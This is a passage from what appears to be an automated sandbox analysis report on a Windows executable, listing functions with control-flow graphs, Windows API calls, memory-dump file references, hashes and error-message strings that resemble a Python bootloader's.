                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F51B032A0A643C6EA60BF11E4403BA6291BF84794F4841B6ED4DC77D5EE3CE60BE700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF6AAE23804), ref: 00007FF6AAE236E1
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE23804), ref: 00007FF6AAE236EB
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6AAE23706,?,00007FF6AAE23804), ref: 00007FF6AAE22C9E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6AAE23706,?,00007FF6AAE23804), ref: 00007FF6AAE22D63
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22C50: MessageBoxW.USER32 ref: 00007FF6AAE22D99
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                • Instruction ID: d1051705bbeb350af035d1e2ddb3381b3951559b383e82543ce2d4e0151c79ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D214F71B1A643C1FE21BF24E8153B62254BF88394F8042F7E65DC66D5EE2DE50AE740

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 691 7ff6aae3ba5c-7ff6aae3ba82 692 7ff6aae3ba9d-7ff6aae3baa1 691->692 693 7ff6aae3ba84-7ff6aae3ba98 call 7ff6aae34ee8 call 7ff6aae34f08 691->693 695 7ff6aae3be77-7ff6aae3be83 call 7ff6aae34ee8 call 7ff6aae34f08 692->695 696 7ff6aae3baa7-7ff6aae3baae 692->696 709 7ff6aae3be8e 693->709 715 7ff6aae3be89 call 7ff6aae3a8e0 695->715 696->695 698 7ff6aae3bab4-7ff6aae3bae2 696->698 698->695 701 7ff6aae3bae8-7ff6aae3baef 698->701 704 7ff6aae3bb08-7ff6aae3bb0b 701->704 705 7ff6aae3baf1-7ff6aae3bb03 call 7ff6aae34ee8 call 7ff6aae34f08 701->705 707 7ff6aae3bb11-7ff6aae3bb17 704->707 708 7ff6aae3be73-7ff6aae3be75 704->708 705->715 707->708 713 7ff6aae3bb1d-7ff6aae3bb20 707->713 712 7ff6aae3be91-7ff6aae3bea8 708->712 709->712 713->705 716 7ff6aae3bb22-7ff6aae3bb47 713->716 715->709 719 7ff6aae3bb49-7ff6aae3bb4b 716->719 720 7ff6aae3bb7a-7ff6aae3bb81 716->720 722 7ff6aae3bb4d-7ff6aae3bb54 719->722 723 7ff6aae3bb72-7ff6aae3bb78 719->723 724 7ff6aae3bb56-7ff6aae3bb6d call 7ff6aae34ee8 call 7ff6aae34f08 call 7ff6aae3a8e0 720->724 725 7ff6aae3bb83-7ff6aae3bb8f call 7ff6aae3d5fc 720->725 722->723 722->724 727 7ff6aae3bbf8-7ff6aae3bc0f 723->727 756 7ff6aae3bd00 724->756 729 7ff6aae3bb94-7ff6aae3bbab call 7ff6aae3a948 * 2 725->729 731 7ff6aae3bc8a-7ff6aae3bc94 call 7ff6aae4391c 727->731 732 7ff6aae3bc11-7ff6aae3bc19 727->732 752 7ff6aae3bbc8-7ff6aae3bbf3 call 7ff6aae3c284 729->752 753 7ff6aae3bbad-7ff6aae3bbc3 call 7ff6aae34f08 call 7ff6aae34ee8 729->753 744 7ff6aae3bc9a-7ff6aae3bcaf 731->744 745 7ff6aae3bd1e 731->745 732->731 736 7ff6aae3bc1b-7ff6aae3bc1d 732->736 736->731 737 7ff6aae3bc1f-7ff6aae3bc35 736->737 737->731 741 7ff6aae3bc37-7ff6aae3bc43 737->741 741->731 746 7ff6aae3bc45-7ff6aae3bc47 741->746 744->745 750 7ff6aae3bcb1-7ff6aae3bcc3 GetConsoleMode 744->750 748 7ff6aae3bd23-7ff6aae3bd43 ReadFile 745->748 746->731 751 7ff6aae3bc49-7ff6aae3bc61 746->751 754 7ff6aae3bd49-7ff6aae3bd51 748->754 755 7ff6aae3be3d-7ff6aae3be46 GetLastError 748->755 750->745 757 7ff6aae3bcc5-7ff6aae3bccd 750->757 751->731 761 7ff6aae3bc63-7ff6aae3bc6f 751->761 752->727 753->756 754->755 763 7ff6aae3bd57 754->763 758 7ff6aae3be48-7ff6aae3be5e call 7ff6aae34f08 call 7ff6aae34ee8 755->758 759 7ff6aae3be63-7ff6aae3be66 755->759 760 7ff6aae3bd03-7ff6aae3bd0d call 7ff6aae3a948 756->760 757->748 765 7ff6aae3bccf-7ff6aae3bcf1 ReadConsoleW 757->765 758->756 769 7ff6aae3bcf9-7ff6aae3bcfb call 7ff6aae34e7c 759->769 770 7ff6aae3be6c-7ff6aae3be6e 759->770 760->712 761->731 768 7ff6aae3bc71-7ff6aae3bc73 761->768 772 7ff6aae3bd5e-7ff6aae3bd73 763->772 774 7ff6aae3bcf3 GetLastError 765->774 775 7ff6aae3bd12-7ff6aae3bd1c 765->775 768->731 779 7ff6aae3bc75-7ff6aae3bc85 768->779 769->756 770->760 772->760 781 7ff6aae3bd75-7ff6aae3bd80 772->781 774->769 775->772 779->731 784 7ff6aae3bda7-7ff6aae3bdaf 781->784 785 7ff6aae3bd82-7ff6aae3bd9b call 7ff6aae3b674 781->785 786 7ff6aae3be2b-7ff6aae3be38 call 7ff6aae3b4b4 784->786 787 7ff6aae3bdb1-7ff6aae3bdc3 784->787 793 7ff6aae3bda0-7ff6aae3bda2 785->793 786->793 790 7ff6aae3be1e-7ff6aae3be26 787->790 791 7ff6aae3bdc5 787->791 790->760 794 7ff6aae3bdca-7ff6aae3bdd1 791->794 793->760 796 7ff6aae3be0d-7ff6aae3be18 794->796 797 7ff6aae3bdd3-7ff6aae3bdd7 794->797 796->790 798 7ff6aae3bdd9-7ff6aae3bde0 797->798 799 7ff6aae3bdf3 797->799 798->799 800 7ff6aae3bde2-7ff6aae3bde6 798->800 801 7ff6aae3bdf9-7ff6aae3be09 799->801 800->799 802 7ff6aae3bde8-7ff6aae3bdf1 800->802 801->794 803 7ff6aae3be0b 801->803 802->801 803->790
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                • Instruction ID: 2e882a6d3a00fc7339fb4ba1f3d9765ebbd13e54dbe0dff70d2b6d79d5a33f38
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AC1E53290E686C1E660AB1594402BDBB94FF81B80F5541B3EACF877A1CF7DE446A720

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                • Instruction ID: 6341aadcdf725368f5c7275848db9061061e6c0a630898116aa5093c53237f4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7416F31A1AA87D1EE25FF21E4142E96355FF94384F8002B3DA9C83695EF3CE50AD740

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                • Instruction ID: 20d4ef8098239df77655749c50c9030723abb80f17ebffbfe72c9684460e29ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E419032D19781C7E710AB219514379A2A0FB943A4F10937AE69C43BE2DF6CA1E29720

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                • Instruction ID: 9a2407f3bf8bdb4d5f30069b4adda1286f4b94b1db38f5de94a38e55ad617085
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27314931E0A203C1FE15BF24D4623B95681BF81384F4454F7DA4EC72E3DE2EA80AA211

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 967 7ff6aae3013c-7ff6aae30169 968 7ff6aae3016b-7ff6aae3016e 967->968 969 7ff6aae30185 967->969 968->969 970 7ff6aae30170-7ff6aae30173 968->970 971 7ff6aae30187-7ff6aae3019b 969->971 972 7ff6aae3019c-7ff6aae3019f 970->972 973 7ff6aae30175-7ff6aae3017a call 7ff6aae34f08 970->973 975 7ff6aae301a1-7ff6aae301ad 972->975 976 7ff6aae301af-7ff6aae301b3 972->976 985 7ff6aae30180 call 7ff6aae3a8e0 973->985 975->976 977 7ff6aae301da-7ff6aae301e3 975->977 978 7ff6aae301c7-7ff6aae301ca 976->978 979 7ff6aae301b5-7ff6aae301bf call 7ff6aae4a4d0 976->979 983 7ff6aae301ea 977->983 984 7ff6aae301e5-7ff6aae301e8 977->984 978->973 982 7ff6aae301cc-7ff6aae301d8 978->982 979->978 982->973 982->977 987 7ff6aae301ef-7ff6aae3020e 983->987 984->987 985->969 989 7ff6aae30214-7ff6aae30222 987->989 990 7ff6aae30355-7ff6aae30358 987->990 991 7ff6aae3029a-7ff6aae3029f 989->991 992 7ff6aae30224-7ff6aae3022b 989->992 990->971 994 7ff6aae3030c-7ff6aae3030f call 7ff6aae3beac 991->994 995 7ff6aae302a1-7ff6aae302ad 991->995 992->991 993 7ff6aae3022d 992->993 997 7ff6aae30380 993->997 998 7ff6aae30233-7ff6aae3023d 993->998 1004 7ff6aae30314-7ff6aae30317 994->1004 999 7ff6aae302b9-7ff6aae302bf 995->999 1000 7ff6aae302af-7ff6aae302b6 995->1000 1003 7ff6aae30385-7ff6aae30390 997->1003 1001 7ff6aae3035d-7ff6aae30361 998->1001 1005 7ff6aae30243-7ff6aae30249 998->1005 999->1001 1002 7ff6aae302c5-7ff6aae302e2 call 7ff6aae3a47c call 7ff6aae3ba5c 999->1002 1000->999 1006 7ff6aae30370-7ff6aae3037b call 7ff6aae34f08 1001->1006 1007 7ff6aae30363-7ff6aae3036b call 7ff6aae4a4d0 1001->1007 1026 7ff6aae302e7-7ff6aae302e9 1002->1026 1003->971 1004->1003 1009 7ff6aae30319-7ff6aae3031c 1004->1009 1010 7ff6aae3024b-7ff6aae3024e 1005->1010 1011 7ff6aae30281-7ff6aae30295 1005->1011 1006->985 1007->1006 1009->1001 1017 7ff6aae3031e-7ff6aae30335 1009->1017 1012 7ff6aae3026c-7ff6aae30277 call 7ff6aae34f08 call 7ff6aae3a8e0 1010->1012 1013 7ff6aae30250-7ff6aae30256 1010->1013 1018 7ff6aae3033c-7ff6aae30347 1011->1018 1033 7ff6aae3027c 1012->1033 1019 7ff6aae30258-7ff6aae30260 call 7ff6aae49e30 1013->1019 1020 7ff6aae30262-7ff6aae30267 call 7ff6aae4a4d0 1013->1020 1017->1018 1018->989 1024 7ff6aae3034d 1018->1024 1019->1033 1020->1012 1024->990 1030 7ff6aae302ef 1026->1030 1031 7ff6aae30395-7ff6aae3039a 1026->1031 1030->997 1034 7ff6aae302f5-7ff6aae3030a 1030->1034 1031->1003 1033->1011 1034->1018
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                • Instruction ID: ee591da5858ed80551de241809c39ecc10c29b57db939fd83bb3ebce91de88c0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E951EC31B0B241C6F7A4B925940067EE691BF44BA4F1847B6DEED837E5CE3CD542A720

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                • Instruction ID: 34949d68e923cbe95bae26c4ddbeddb1215e021ae6d3c77ce29e1120969cf8e6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99110832608A81C1DA109B25B810069B361BB81FF0F544372EFBD877E5CE7CD416A700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00007FF6AAE3A9D5,?,?,00000000,00007FF6AAE3AA8A), ref: 00007FF6AAE3ABC6
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6AAE3A9D5,?,?,00000000,00007FF6AAE3AA8A), ref: 00007FF6AAE3ABD0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                • Instruction ID: 80fbb5839399179f9a0242a8a5019cd8ce8e905f73db904de2e3cb14e6916df9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F821DB31F1A682C1FA507751945437DA283BF84790F4442BBDA9EC77E1CE6EE4936310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                • Instruction ID: 8d9011ed714bce13932c1fd56b981ad6360cc8fad053d6870693eb73857bcd25
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D41A13291A645C7EA24AA19A94027DB3A0FF55B80F101176DACFC36E1CF6DE443AB61
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
